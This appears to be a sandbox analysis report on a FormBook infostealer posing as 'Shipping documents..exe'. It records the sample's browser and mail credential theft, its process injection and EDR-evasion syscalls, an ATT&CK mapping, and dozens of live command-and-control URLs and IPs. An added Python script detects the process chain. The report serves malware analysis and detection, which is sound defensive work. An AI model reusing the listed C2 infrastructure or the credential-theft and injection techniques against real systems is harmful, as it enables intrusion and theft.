                Source: C:\Users\user\Desktop\Shipping documents..exe Code function: 0_2_00472C3F GetUserNameW
                Source: C:\Users\user\Desktop\Shipping documents..exe Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\Shipping documents..exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary

                Stealing of Sensitive Information

                Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000008.00000002.4571453200.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4568813272.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2433270626.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4568990359.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2432620170.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.4568829458.00000000051E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4559476128.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2437565309.0000000006600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\ktmutil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: Shipping documents..exe Binary or memory string: WIN_XP
                Source: Shipping documents..exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                Source: Shipping documents..exe Binary or memory string: WIN_XPe
                Source: Shipping documents..exe Binary or memory string: WIN_VISTA
                Source: Shipping documents..exe Binary or memory string: WIN_7
                Source: Shipping documents..exe Binary or memory string: WIN_8

                Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.4571453200.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4568813272.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2433270626.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4568990359.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2432620170.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4568829458.00000000051E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4559476128.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2437565309.0000000006600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Shipping documents..exe | Code function 0_2_004652BE: socket, WSAGetLastError, bind, WSAGetLastError, closesocket, listen, WSAGetLastError, closesocket
Source: C:\Users\user\Desktop\Shipping documents..exe | Code function 0_2_00476619: socket, WSAGetLastError, bind, WSAGetLastError, closesocket
Source: C:\Users\user\Desktop\Shipping documents..exe | Code function 0_2_0046CEF3: OleInitialize, _wcslen, CreateBindCtx, MkParseDisplayName, CLSIDFromProgID, GetActiveObject
MITRE ATT&CK Matrix (listed by tactic; the number before a technique is the count the report shows for it, entries without a number are the matrix's placeholder cells with no hit)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Native API; 2 Command and Scripting Interpreter; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 16 System Information Discovery; 141 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 5 Ingress Tool Transfer; 1 Encrypted Channel; 5 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph (ID 1549915; sample: Shipping documents..exe; start date: 06/11/2024; architecture: Windows; score: 100). Numbers in parentheses after a process name are the badge values the graph shows for that node (see the legend above).

Start
  DNS/IP: www.schedulemassage.xyz; www.huiguang.xyz (Performs DNS queries to domains with low reputation); 19 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 4 other signatures
  -> started: Shipping documents..exe (1)
Shipping documents..exe
  Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
  -> started: svchost.exe
svchost.exe
  Signatures: Maps a DLL or memory area into another process
  -> injected: FuFneNIzDsF.exe
FuFneNIzDsF.exe (injected by svchost.exe)
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)
  -> started: ktmutil.exe (13); srdelayed.exe
ktmutil.exe
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
  -> injected: FuFneNIzDsF.exe; started: firefox.exe
FuFneNIzDsF.exe (injected by ktmutil.exe)
  DNS/IP: www.futurevision.life 203.161.49.193, ports 49987, 49988, 49989, VNPT-AS-VN VNPT Corp VN, Malaysia; www.klohk.tech 103.224.182.242, ports 50005, 50006, 50007, TRELLIAN-AS-AP Trellian Pty Limited AU, Australia; 10 other IPs or domains
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)
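The graph above is a process tree that can be hunted for in endpoint telemetry without any malware-specific signature: a sample with a double-dot file name spawns svchost.exe, that svchost.exe (not started by services.exe) spawns the SysWOW64 utilities ktmutil.exe and srdelayed.exe, and ktmutil.exe in turn launches firefox.exe while reading browser and mail credential stores. The script below is an added example, not part of the Joe Sandbox report: it runs those parent-child checks over constructed Sysmon event ID 1 style records that mirror the report's tree. The PIDs, full paths and the two benign rows are invented for the example; the checks, names and output format are this example's own.

```python
"""Flag the process chain from the behaviour graph in process-creation records.

Added example, not part of the Joe Sandbox report. EVENTS is constructed to
mirror the report's process tree (Shipping documents..exe -> svchost.exe ->
ktmutil.exe / srdelayed.exe -> firefox.exe) using Sysmon event ID 1 style
fields; the PIDs and full paths are invented, and the two benign rows at the
end are there so the checks have something to leave alone.
"""
import ntpath
from typing import Any, Dict, List

Event = Dict[str, Any]

EVENTS: List[Event] = [
    {"pid": 4012, "ppid": 2200, "image": r"C:\Users\user\Desktop\Shipping documents..exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"pid": 4100, "ppid": 4012, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "parent_image": r"C:\Users\user\Desktop\Shipping documents..exe"},
    {"pid": 4188, "ppid": 4100, "image": r"C:\Windows\SysWOW64\ktmutil.exe",
     "parent_image": r"C:\Windows\SysWOW64\svchost.exe"},
    {"pid": 4190, "ppid": 4100, "image": r"C:\Windows\SysWOW64\srdelayed.exe",
     "parent_image": r"C:\Windows\SysWOW64\svchost.exe"},
    {"pid": 4300, "ppid": 4188, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "parent_image": r"C:\Windows\SysWOW64\ktmutil.exe"},
    # Benign (constructed): the normal svchost parent, and a browser started from the shell.
    {"pid": 900, "ppid": 700, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe"},
    {"pid": 5000, "ppid": 2200, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
]

# The two Windows utilities the behaviour graph shows being spawned by the
# injected svchost.exe and then used for credential theft. Extend as needed.
ABUSED_UTILITIES = {"ktmutil.exe", "srdelayed.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe"}


def base(image: str) -> str:
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(image).lower()


def suspicious_name(image: str) -> bool:
    """Double dot before the extension, as in 'Shipping documents..exe'."""
    return ".." in base(image)


def svchost_not_from_services(ev: Event) -> bool:
    """services.exe is the expected parent of svchost.exe; allow-list any other
    parent you see in your own baseline rather than loosening this check."""
    return base(ev["image"]) == "svchost.exe" and base(ev["parent_image"]) != "services.exe"


def utility_from_svchost(ev: Event) -> bool:
    return base(ev["image"]) in ABUSED_UTILITIES and base(ev["parent_image"]) == "svchost.exe"


def browser_from_utility(ev: Event) -> bool:
    return base(ev["image"]) in BROWSERS and base(ev["parent_image"]) in ABUSED_UTILITIES


def process_chain(events: List[Event], pid: int) -> List[str]:
    """Walk ppid links back to the root; when a parent is not in the log, fall
    back to the parent_image recorded on the child. Returns root first."""
    by_pid = {ev["pid"]: ev for ev in events}
    names: List[str] = []
    ev = by_pid.get(pid)
    while ev is not None:
        names.append(base(ev["image"]))
        parent = by_pid.get(ev["ppid"])
        if parent is None:
            names.append(base(ev["parent_image"]))
        ev = parent
    return list(reversed(names))


def analyse(events: List[Event]) -> List[Dict[str, Any]]:
    """Return one finding per event that trips at least one check."""
    findings = []
    for ev in events:
        reasons = []
        if suspicious_name(ev["image"]):
            reasons.append("suspicious file name (double dot before extension)")
        if svchost_not_from_services(ev):
            reasons.append("svchost.exe not started by services.exe")
        if utility_from_svchost(ev):
            reasons.append("system utility spawned by svchost.exe")
        if browser_from_utility(ev):
            reasons.append("browser launched by a system utility")
        if reasons:
            findings.append({"pid": ev["pid"], "chain": process_chain(events, ev["pid"]), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyse(EVENTS):
        print(finding["pid"], " -> ".join(finding["chain"]), "|", "; ".join(finding["reasons"]))
```

Each of the five rows that belong to the report's chain trips a check, the two benign rows do not, and the chain printed for the firefox.exe row reads explorer.exe -> shipping documents..exe -> svchost.exe -> ktmutil.exe -> firefox.exe, which is the path the graph draws. The injected FuFneNIzDsF.exe node does not appear in process-creation telemetry at all, which is why the checks key on the host processes around it.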

Source | Detection | Scanner | Label | Link
Shipping documents..exe | 42% | ReversingLabs | Win32.Trojan.Generic
Shipping documents..exe | 100% | Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
https://nfqb.info | 0% | Avira URL Cloud | safe
https://dmqb.info | 0% | Avira URL Cloud | safe
http://www.migorengya8.click/y3dc/?DDp=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tREfAnxyZwa91URYeYbxhv5bPljMHSbrvZtVpRz6w5PNfkG2YKS2Ps=&SvrLY=3P8lALA | 0% | Avira URL Cloud | safe
https://wmqqb.com | 0% | Avira URL Cloud | safe
https://anqb.top | 0% | Avira URL Cloud | safe
https://dhqb.info | 0% | Avira URL Cloud | safe
http://www.klohk.tech/3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cD9BPWmhuph4utiW3Dhv00Os4z+1dRn6W+dMqbZ0s1lU/AMvHhe0= | 0% | Avira URL Cloud | safe
http://www.econsultoria.online/azb9/ | 0% | Avira URL Cloud | safe
https://wqxs.info | 0% | Avira URL Cloud | safe
https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo | 0% | Avira URL Cloud | safe
https://egqb.top | 0% | Avira URL Cloud | safe
http://www.d63dm.top/rqnz/ | 0% | Avira URL Cloud | safe
http://www.030002128.xyz/knx2/?DDp=cx1F/qf6XWf+sqaNqgWjpjf2u/FJ3U1rCAFJJdWfl5OjgpHNlJW/Jou+UuCSZllgDcZAwgAs0R21dhdWF/X3usItMGO4lmDkyY4fIJ/HYM1kf3catma7zBplk9C6FFtSionVViQ=&SvrLY=3P8lALA | 0% | Avira URL Cloud | safe
http://www.futurevision.life/hxmz/?DDp=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts=&SvrLY=3P8lALA | 0% | Avira URL Cloud | safe
http://www.bzxs.info/v58i/?DDp=IC0zr/ZDVxaNAMf8momja46h3KrCsn6WQsgf7AvDnsA3Q4GKUMSc84jsP15lI7VDCiKPTCHe1ALE8uTr9rusPZ5vALoLFqWsTHRljYdsCfeo56EDBh/tAO+VOLzkgSIV0llmzE8=&SvrLY=3P8lALA | 0% | Avira URL Cloud | safe
https://erxs.top | 0% | Avira URL Cloud | safe
https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campa | 0% | Avira URL Cloud | safe
https://iwqb.top | 0% | Avira URL Cloud | safe
https://yqqb.xyz | 0% | Avira URL Cloud | safe
https://xuaxs.com | 0% | Avira URL Cloud | safe
http://www.cesach.net/qutj/ | 0% | Avira URL Cloud | safe
https://gwqqb.com | 0% | Avira URL Cloud | safe
https://gdlqb.com | 0% | Avira URL Cloud | safe
https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensa | 0% | Avira URL Cloud | safe
https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=we | 0% | Avira URL Cloud | safe
https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_camp | 0% | Avira URL Cloud | safe
http://www.econsultoria.online | 0% | Avira URL Cloud | safe
http://www.migorengya8.click/y3dc/ | 0% | Avira URL Cloud | safe
https://oejqb.com | 0% | Avira URL Cloud | safe
http://www.mcfunding.org/0598/?SvrLY=3P8lALA&DDp=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM= | 0% | Avira URL Cloud | safe
http://www.servannto.site/h26k/ | 0% | Avira URL Cloud | safe
http://www.auto-deals-cz-000.buzz/geci/ | 0% | Avira URL Cloud | safe
https://aqqb.info | 0% | Avira URL Cloud | safe
http://www.klohk.tech/3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu | 0% | Avira URL Cloud | safe
http://www.klohk.tech/3m3e/ | 0% | Avira URL Cloud | safe
http://www.bzxs.info/v58i/ | 0% | Avira URL Cloud | safe
https://mgnxs.com | 0% | Avira URL Cloud | safe
https://pmqb.xyz | 0% | Avira URL Cloud | safe
http://www.futurevision.life/hxmz/ | 0% | Avira URL Cloud | safe
https://ncxs.xyz | 0% | Avira URL Cloud | safe
https://cpjqb.com | 0% | Avira URL Cloud | safe
http://www.telforce.one/ykhz/?DDp=enw3MzdkIinzycog2d+xaWpEHXfvQHhn7Q0Xf9Uq8WeILZ9WFoLyJZQsqpUbcYSzxWL6OSWVl3hVVR/aqS9N6hR069XLEnbGwgzEaDN1WPABKrmY5eDWHUcJ5DCyIOZX0iwQYxg=&SvrLY=3P8lALA | 0% | Avira URL Cloud | safe
https://gsxs.info | 0% | Avira URL Cloud | safe
https://gdxs.info | 0% | Avira URL Cloud | safe
https://aiqb.top | 0% | Avira URL Cloud | safe
http://www.telforce.one/ykhz/ | 0% | Avira URL Cloud | safe
https://zeqb.info | 0% | Avira URL Cloud | safe
http://www.cesach.net/qutj/?SvrLY=3P8lALA&DDp=7+JhtXYoap6hQUSymN1iKxwf+aYIN87BChjykmSFD5cBOLIEN7eTZiNCYJGnmhE2/2tIBPcr+sPRMyccTmjbMYtkzAsmzkJCtDvOtemIhBWnTn54lM+8e5KyjQNsphyX8LHz3fM= | 0% | Avira URL Cloud | safe
http://www.beingandbecoming.ltd/79tr/ | 0% | Avira URL Cloud | safe
https://znqb.info | 0% | Avira URL Cloud | safe
https://stzqb.com | 0% | Avira URL Cloud | safe
https://chqb.info | 0% | Avira URL Cloud | safe
https://hgqb.xyz | 0% | Avira URL Cloud | safe
https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaign | 0% | Avira URL Cloud | safe
https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dom | 0% | Avira URL Cloud | safe
https://ozxs.top | 0% | Avira URL Cloud | safe
http://www.mcfunding.org/0598/ | 0% | Avira URL Cloud | safe
https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=host | 0% | Avira URL Cloud | safe
https://ltqb.info | 0% | Avira URL Cloud | safe
http://www.huiguang.xyz/hv6g/?SvrLY=3P8lALA&DDp=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q= | 0% | Avira URL Cloud | safe
http://www.beingandbecoming.ltd/79tr/?DDp=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&SvrLY=3P8lALA | 0% | Avira URL Cloud | safe
http://www.auto-deals-cz-000.buzz/geci/?SvrLY=3P8lALA&DDp=OUcUcMiN7UFwaCotsW6AMJwehyiwg2RPC2z6ZMYslxYDHrlwQ88kbad89mN4OjllqHqnU6tumNLMTG1picng1VYsD50x98ZhJyamHAiRPzZYiWViTqiNWtopHV1ePKkjcICWV3I= | 0% | Avira URL Cloud | safe
http://www.030002128.xyz/knx2/ | 0% | Avira URL Cloud | safe
http://www.d63dm.top/rqnz/?DDp=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5j7kTaNGBLKG6O6VRta8dhdFdziPB3CVN6I/2AxSEUg2RCppISrE=&SvrLY=3P8lALA | 0% | Avira URL Cloud | safe
https://esfqb.com | 0% | Avira URL Cloud | safe
https://34.92.79.175:19817/register | 0% | Avira URL Cloud | safe
http://www.servannto.site/h26k/?DDp=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcHbS91xJIfYTkMJziJL2bz2TZCx10rmCstVSToHcp1Wua4EZrnYI=&SvrLY=3P8lALA | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
d63dm.top | 154.23.184.218 | true | true | - | unknown
beingandbecoming.ltd | 3.33.130.190 | true | true | - | unknown
econsultoria.online | 3.33.130.190 | true | true | - | unknown
www.cesach.net | 217.76.156.252 | true | true | - | unknown
www.auto-deals-cz-000.buzz | 199.59.243.227 | true | true | - | unknown
schedulemassage.xyz | 3.33.130.190 | true | true | - | unknown
www.030002128.xyz | 161.97.142.144 | true | true | - | unknown
mcfunding.org | 3.33.130.190 | true | true | - | unknown
www.bzxs.info | 188.114.97.3 | true | true | - | unknown
www.huiguang.xyz | 154.92.61.37 | true | true | - | unknown
www.servannto.site | 31.31.196.17 | true | true | - | unknown
www.klohk.tech | 103.224.182.242 | true | true | - | unknown
www.telforce.one | 13.248.169.48 | true | true | - | unknown
migorengya8.click | 198.252.98.54 | true | true | - | unknown
www.futurevision.life | 203.161.49.193 | true | true | - | unknown
www.migorengya8.click | unknown | unknown | false | - | unknown
www.mcfunding.org | unknown | unknown | false | - | unknown
www.d63dm.top | unknown | unknown | false | - | unknown
www.beingandbecoming.ltd | unknown | unknown | false | - | unknown
www.econsultoria.online | unknown | unknown | false | - | unknown
www.schedulemassage.xyz | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.econsultoria.online/azb9/ | true | Avira URL Cloud: safe | unknown
http://www.migorengya8.click/y3dc/?DDp=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tREfAnxyZwa91URYeYbxhv5bPljMHSbrvZtVpRz6w5PNfkG2YKS2Ps=&SvrLY=3P8lALA | true | Avira URL Cloud: safe | unknown
http://www.klohk.tech/3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cD9BPWmhuph4utiW3Dhv00Os4z+1dRn6W+dMqbZ0s1lU/AMvHhe0= | true | Avira URL Cloud: safe | unknown
http://www.d63dm.top/rqnz/ | true | Avira URL Cloud: safe | unknown
http://www.bzxs.info/v58i/?DDp=IC0zr/ZDVxaNAMf8momja46h3KrCsn6WQsgf7AvDnsA3Q4GKUMSc84jsP15lI7VDCiKPTCHe1ALE8uTr9rusPZ5vALoLFqWsTHRljYdsCfeo56EDBh/tAO+VOLzkgSIV0llmzE8=&SvrLY=3P8lALA | true | Avira URL Cloud: safe | unknown
http://www.030002128.xyz/knx2/?DDp=cx1F/qf6XWf+sqaNqgWjpjf2u/FJ3U1rCAFJJdWfl5OjgpHNlJW/Jou+UuCSZllgDcZAwgAs0R21dhdWF/X3usItMGO4lmDkyY4fIJ/HYM1kf3catma7zBplk9C6FFtSionVViQ=&SvrLY=3P8lALA | true | Avira URL Cloud: safe | unknown
http://www.futurevision.life/hxmz/?DDp=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts=&SvrLY=3P8lALA | true | Avira URL Cloud: safe | unknown
http://www.cesach.net/qutj/ | true | Avira URL Cloud: safe | unknown
http://www.migorengya8.click/y3dc/ | true | Avira URL Cloud: safe | unknown
http://www.mcfunding.org/0598/?SvrLY=3P8lALA&DDp=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM= | true | Avira URL Cloud: safe | unknown
http://www.servannto.site/h26k/ | true | Avira URL Cloud: safe | unknown
http://www.auto-deals-cz-000.buzz/geci/ | true | Avira URL Cloud: safe | unknown
http://www.futurevision.life/hxmz/ | true | Avira URL Cloud: safe | unknown
http://www.klohk.tech/3m3e/ | true | Avira URL Cloud: safe | unknown
http://www.bzxs.info/v58i/ | true | Avira URL Cloud: safe | unknown
http://www.telforce.one/ykhz/?DDp=enw3MzdkIinzycog2d+xaWpEHXfvQHhn7Q0Xf9Uq8WeILZ9WFoLyJZQsqpUbcYSzxWL6OSWVl3hVVR/aqS9N6hR069XLEnbGwgzEaDN1WPABKrmY5eDWHUcJ5DCyIOZX0iwQYxg=&SvrLY=3P8lALA | true | Avira URL Cloud: safe | unknown
http://www.telforce.one/ykhz/ | true | Avira URL Cloud: safe | unknown
http://www.cesach.net/qutj/?SvrLY=3P8lALA&DDp=7+JhtXYoap6hQUSymN1iKxwf+aYIN87BChjykmSFD5cBOLIEN7eTZiNCYJGnmhE2/2tIBPcr+sPRMyccTmjbMYtkzAsmzkJCtDvOtemIhBWnTn54lM+8e5KyjQNsphyX8LHz3fM= | true | Avira URL Cloud: safe | unknown
http://www.beingandbecoming.ltd/79tr/ | true | Avira URL Cloud: safe | unknown
http://www.mcfunding.org/0598/ | true | Avira URL Cloud: safe | unknown
